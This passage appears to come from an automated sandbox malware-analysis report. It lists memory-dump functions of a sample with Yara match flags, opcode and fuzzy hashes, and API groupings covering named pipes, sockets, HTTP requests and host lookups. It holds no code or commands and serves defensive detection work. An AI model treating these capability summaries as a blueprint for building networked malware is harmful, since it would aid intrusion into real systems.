                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateNamedPipe
                  • String ID:
                  • API String ID: 2489174969-0
                  • Opcode ID: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                  • Instruction ID: 2478374fdcca897d85e491929338c9e39506317d75c4e64b8d1968ca1379fc2b
                  • Opcode Fuzzy Hash: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                  • Instruction Fuzzy Hash: AB016932510F908AEB19DB20E89835977A1FB9977DF584314E6AC026DAEB7EC119CB00
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                  • Instruction ID: 4fc64af387cb4e7fd985f2fe44b66169ab58e1aac022ab4f59a111e521175504
                  • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                  • Instruction Fuzzy Hash: 4C526FB221499587D708CF1CE4A173AB7E1F7C9B84F44862AE78B8B799CE2DD541DB00
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                  • Instruction ID: cf01a654f1a21af9258314ccdd183a3bbdc47bf65d7715f86c00ffba75ea821d
                  • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                  • Instruction Fuzzy Hash: 165253B221499087D708CF1DE4A573AB7E1F3C9B84F44862AE78B8B799CA3DD545CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: 40c53b571594c944c6c42c99c95be119a294f9789df234ffb94304ec201d3ca9
                  • Instruction ID: dee5c8319b28edca5ab1043385df369583f0f951b72d51d8a2aa44c1bfa8be9d
                  • Opcode Fuzzy Hash: 40c53b571594c944c6c42c99c95be119a294f9789df234ffb94304ec201d3ca9
                  • Instruction Fuzzy Hash: FFF1C572305FB282EB24DB65DC487AE63A1FB9478CF984111EB598768DEB36C905CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: 1b3d1c8f5ea9877e8ed1206496e01479fe179dcfc2b543a7d16d2e920dbf27a1
                  • Instruction ID: bf193c178038854d633b98a0ae23ee3f522cf7c15490a0e81336b7ec8c615189
                  • Opcode Fuzzy Hash: 1b3d1c8f5ea9877e8ed1206496e01479fe179dcfc2b543a7d16d2e920dbf27a1
                  • Instruction Fuzzy Hash: 34E1B272304FF291EB249B65DC843EE67A1FB9479CF880012EA698769DEF36C945C740
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                  • Instruction ID: 56bb7855f2265d436dd1c769b6664470bbe63607a4aa0987c3a2289e6738c0e3
                  • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                  • Instruction Fuzzy Hash: CD610FB5214A9087D718CB0DE4D572AB7E2F3CC7D8F88461AE38A87768DA3DD545CB40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c619139f7531ec7fad6b3bf9a30fe3ab1bdcd9abfa9aa3a719cf8d3fb33ffc0e
                  • Instruction ID: c1ce15b3d2554b6cff18fbd512a0cbcbc11e1a3eeafde3476d50834f1c1c53ed
                  • Opcode Fuzzy Hash: c619139f7531ec7fad6b3bf9a30fe3ab1bdcd9abfa9aa3a719cf8d3fb33ffc0e
                  • Instruction Fuzzy Hash: 0941CB87E1DED14AE35256244C7B1A42FA1BFA7B2174C40BECA4CA36D7EC1E7C069301
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 388fc0e8d687ba06ef0eb527d504c82e799ab2ec37b671ef82ec32a114372916
                  • Instruction ID: d577b84233c69dbc5f5f4b7fbc8389908681cfc8d1d845e612ffbd1e22b2ee54
                  • Opcode Fuzzy Hash: 388fc0e8d687ba06ef0eb527d504c82e799ab2ec37b671ef82ec32a114372916
                  • Instruction Fuzzy Hash: 8E1181E7ED9FE43AE76A81500CAF6541F90BBB1B0CF5D424EDA64432DBB84E5E064250
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                  • Instruction ID: bf8a89a24dd0262084798414e3bc4c5d7e2d2e35fc79d9d8933dc60e06a5a829
                  • Opcode Fuzzy Hash: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                  • Instruction Fuzzy Hash: 99F012A7E1DEF066F26646140C6F3582F91BBB6A1DF4D824AEA60435DBA4070803D212
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                  • Instruction ID: 5346d219b272771fa0c5f5ce861df9ae328da2ed7013aaaea4b99fcb48cf2922
                  • Opcode Fuzzy Hash: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                  • Instruction Fuzzy Hash: F9E0C0AB91DEE05AF36B45740C7E55D2FD1BBB690CF5E8246CB50432C7A54B0C064351
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                  • Instruction ID: 0522c61c11d7f225a0bfaa5d64818673812a23bf05e255c3d89a87cb4bd8a32d
                  • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                  • Instruction Fuzzy Hash: 74D012F7A1DFE015F2A742244C2E3481F917B72528F4C414FCA90062D7A44B58038211
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: acceptioctlsocket$closesockethtonlselect
                  • String ID:
                  • API String ID: 2003300010-0
                  • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                  • Instruction ID: 758905496993353217d729707a16ab6c86c2eecff340e11901e46c07b949d611
                  • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                  • Instruction Fuzzy Hash: 8C918B32610EE09AE728EF25ED4879D33A1FB9879CF040125EB5D47A99DF3AC565C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                  • String ID: %s%s$*/*
                  • API String ID: 3787158362-856325523
                  • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                  • Instruction ID: 0b3d1085e64daf33043b7642477162ceb238a87781473ddcbcedd1444acf2a90
                  • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                  • Instruction Fuzzy Hash: 0E813972200FE495EB18EB65EC883D977A0FB9474CF480526EA5E437A9DF3AC506C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                  • String ID:
                  • API String ID: 34948862-0
                  • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                  • Instruction ID: c4964f1021083a9390b319396d16a1f7aeadbd9b78d62bf6b864be252e29c1a8
                  • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                  • Instruction Fuzzy Hash: 01416031704FA096F718EB61EC5979D33A5FB98BACF584620DE2A47798DF3AC4458700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 1138158220-0
                  • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                  • Instruction ID: d423fd30f4106d944ddaf5930589b1b757b9ae9c888e15fd04ffc0a231e1099f
                  • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                  • Instruction Fuzzy Hash: 9C319631200FA082FB28AB659C5936D66E1BFD9BACF1D4628EA55477EEDF3DC4418300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                  • String ID:
                  • API String ID: 4099253644-0
                  • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                  • Instruction ID: f3e58972325384cb5429dc5b8ea673ecf93f4d946eed60964df7b4043f1f71e9
                  • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                  • Instruction Fuzzy Hash: 8E31CA35201EE181FE5DEB51EC6D7A823A4BF88BACF0C0619DE590A6EDDF6AC4458310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                  • String ID: d
                  • API String ID: 1257931466-2564639436
                  • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                  • Instruction ID: 35fd7a97ad7fcb6eab08dcde9d179495a0901578876f0dc7b778e9799d6f8568
                  • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                  • Instruction Fuzzy Hash: 34318D32214FD196EB248F61EC4979A77A4FB88B8CF085116EE8D47B28DF79C555CB00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                  • String ID:
                  • API String ID: 388111225-0
                  • Opcode ID: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
                  • Instruction ID: d54195015986b5b480fae033f10d88a1169a41464e980058af8a31283e6b486b
                  • Opcode Fuzzy Hash: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
                  • Instruction Fuzzy Hash: CD31F930208F6D4EF3157F58D8EA37A7692EF46328F12065CE4268F6DBDA7698014761
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$ErrorLastSleepselectsend
                  • String ID: d
                  • API String ID: 2152284305-2564639436
                  • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                  • Instruction ID: 53b8a90e6cfe9c1d67dd7e72c5259f6ec333545abe7aeb17be38fa804d29dfe0
                  • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                  • Instruction Fuzzy Hash: FF217F32214ED096E7649F21F8483897361FB8478CF584225EBAD47A98DF39C4558B44
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                  • String ID:
                  • API String ID: 2644381645-0
                  • Opcode ID: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
                  • Instruction ID: de798710277f389ec24ef48c547b8d2a27056d859419dbc6257465556dad9657
                  • Opcode Fuzzy Hash: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
                  • Instruction Fuzzy Hash: 0A213A31618E584EF7197B5CDCEA3BA72D2EF82324F050248E41A8F6EFC66A48414775
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                  • String ID:
                  • API String ID: 3101085627-0
                  • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                  • Instruction ID: 17cddfa089c2535c3aca1e2b6e190003d806caa24a47b05e36697e4af1db843b
                  • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                  • Instruction Fuzzy Hash: 4F418232700EA09AE714AFB5D88879C3371FB98B9CF580226EE1957A5DDF3AC509C350
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                  • String ID:
                  • API String ID: 1078912150-0
                  • Opcode ID: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
                  • Instruction ID: 3e40df24dfa01fec38fa2d81cae280e081140105c514ed3a31b1de77d555b0bb
                  • Opcode Fuzzy Hash: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
                  • Instruction Fuzzy Hash: A5213E31608A684EF318775CDCEA37E72D1DF85329F16025CE01A8F6DBD6A598014771
                  APIs
                  Memory Dump Source
